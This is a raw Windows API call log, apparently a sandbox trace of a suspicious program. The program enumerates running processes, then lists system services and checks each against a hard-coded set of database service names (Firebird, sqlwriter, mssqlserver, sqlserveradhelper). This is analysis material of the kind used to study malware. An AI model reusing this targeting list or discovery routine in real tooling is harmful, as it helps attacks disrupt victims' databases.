[0300.425] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0300.425] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x378 [0300.434] Process32FirstW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.435] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0300.436] lstrlenW (lpString="System") returned 6 [0300.436] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0300.437] lstrlenW (lpString="smss.exe") returned 8 [0300.437] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0300.437] lstrlenW (lpString="csrss.exe") returned 9 [0300.437] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0300.438] lstrlenW (lpString="wininit.exe") returned 11 [0300.438] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0300.439] lstrlenW (lpString="csrss.exe") returned 9 [0300.439] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0300.440] lstrlenW (lpString="winlogon.exe") returned 12 [0300.440] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0300.441] lstrlenW (lpString="services.exe") returned 12 [0300.441] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0300.442] lstrlenW (lpString="lsass.exe") returned 9 [0300.442] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0300.443] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0300.443] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0300.444] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0300.444] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.444] lstrlenW (lpString="svchost.exe") returned 11 [0300.444] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.445] lstrlenW (lpString="svchost.exe") returned 11 [0300.445] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0300.446] lstrlenW (lpString="dwm.exe") returned 7 [0300.446] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.447] lstrlenW (lpString="svchost.exe") returned 11 [0300.447] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.448] lstrlenW (lpString="svchost.exe") returned 11 [0300.448] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.448] lstrlenW (lpString="svchost.exe") returned 11 [0300.448] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.449] lstrlenW (lpString="svchost.exe") returned 11 [0300.449] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.450] lstrlenW (lpString="svchost.exe") returned 11 [0300.450] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.451] lstrlenW (lpString="svchost.exe") returned 11 [0300.451] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.452] lstrlenW (lpString="svchost.exe") returned 11 [0300.452] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.453] lstrlenW (lpString="svchost.exe") returned 11 [0300.453] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.454] lstrlenW (lpString="svchost.exe") returned 11 [0300.454] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.454] lstrlenW (lpString="svchost.exe") returned 11 [0300.455] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0300.686] lstrlenW (lpString="spoolsv.exe") returned 11 [0300.686] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.687] lstrlenW (lpString="svchost.exe") returned 11 [0300.687] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0300.687] lstrlenW (lpString="audiodg.exe") returned 11 [0300.687] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0300.688] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0300.688] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0300.689] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0300.689] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0300.689] lstrlenW (lpString="Memory Compression") returned 18 [0300.689] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0300.690] lstrlenW (lpString="sihost.exe") returned 10 [0300.690] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.691] lstrlenW (lpString="svchost.exe") returned 11 [0300.691] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0300.691] lstrlenW (lpString="taskhostw.exe") returned 13 [0300.691] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0300.693] lstrlenW (lpString="explorer.exe") returned 12 [0300.693] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0300.693] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0300.693] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0300.694] lstrlenW (lpString="SearchUI.exe") returned 12 [0300.694] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0300.695] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0300.695] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0300.695] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0300.695] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0300.736] lstrlenW (lpString="wdgmug.exe") returned 10 [0300.736] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0300.737] lstrlenW (lpString="cmd.exe") returned 7 [0300.737] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0300.738] lstrlenW (lpString="conhost.exe") returned 11 [0300.738] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0300.739] lstrlenW (lpString="mode.com") returned 8 [0300.739] Process32NextW (in: hSnapshot=0x378, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 0 [0300.740] CloseHandle (hObject=0x378) returned 1 [0300.740] Sleep (dwMilliseconds=0x1f4) [0301.673] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x401a080 [0301.679] EnumServicesStatusExW (in: hSCManager=0x401a080, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0301.680] GetLastError () returned 0xea [0301.680] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1bc4) returned 0x415db18 [0301.680] EnumServicesStatusExW (in: hSCManager=0x401a080, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x415db18, cbBufSize=0x1bc4, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x415db18, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0301.681] CloseServiceHandle (hSCObject=0x401a080) returned 1 [0301.681] lstrlenW (lpString="AppXSvc") returned 7 [0301.681] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0301.681] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0301.681] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0301.681] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0301.681] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0301.681] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0301.681] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0301.681] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0301.681] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0301.681] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0301.681] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0301.681] lstrlenW (lpString="Audiosrv") returned 8 [0301.681] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0301.681] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0301.681] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0301.682] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0301.682] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0301.682] lstrlenW (lpString="BFE") returned 3 [0301.682] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0301.682] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0301.682] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0301.682] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0301.682] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0301.682] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0301.682] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0301.682] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0301.682] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0301.682] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0301.682] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0301.682] lstrlenW (lpString="CDPSvc") returned 6 [0301.682] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0301.682] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0301.682] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0301.682] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0301.682] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0301.682] lstrlenW (lpString="ClickToRunSvc") returned 13 [0301.682] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0301.682] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0301.682] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0301.682] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0301.682] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0301.682] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0301.682] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0301.682] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0301.682] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0301.682] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0301.682] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0301.682] lstrlenW (lpString="CryptSvc") returned 8 [0301.682] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0301.683] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0301.683] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0301.683] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0301.683] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0301.683] lstrlenW (lpString="DcomLaunch") returned 10 [0301.683] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0301.683] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0301.683] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0301.683] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0301.683] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0301.683] lstrlenW (lpString="DeviceAssociationService") returned 24 [0301.683] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0301.683] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0301.683] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0301.683] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0301.683] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0301.683] lstrlenW (lpString="Dhcp") returned 4 [0301.683] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0301.683] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0301.683] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0301.683] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0301.683] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0301.683] lstrlenW (lpString="Dnscache") returned 8 [0301.683] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0301.683] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0301.683] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0301.683] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0301.683] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0301.683] lstrlenW (lpString="DPS") returned 3 [0301.683] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0301.683] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0301.683] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0301.683] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0301.684] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0301.684] lstrlenW (lpString="DusmSvc") returned 7 [0301.684] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0301.684] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0301.684] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0301.684] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0301.684] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0301.684] lstrlenW (lpString="EventLog") returned 8 [0301.684] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0301.684] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0301.684] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0301.684] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0301.684] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0301.684] lstrlenW (lpString="EventSystem") returned 11 [0301.684] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0301.684] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0301.684] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0301.684] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0301.684] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0301.684] lstrlenW (lpString="FontCache") returned 9 [0301.684] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0301.684] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0301.684] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0301.684] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0301.684] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0301.684] lstrlenW (lpString="gpsvc") returned 5 [0301.684] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0301.684] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0301.684] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0301.684] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0301.684] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0301.684] lstrlenW (lpString="iphlpsvc") returned 8 [0301.684] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0301.684] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 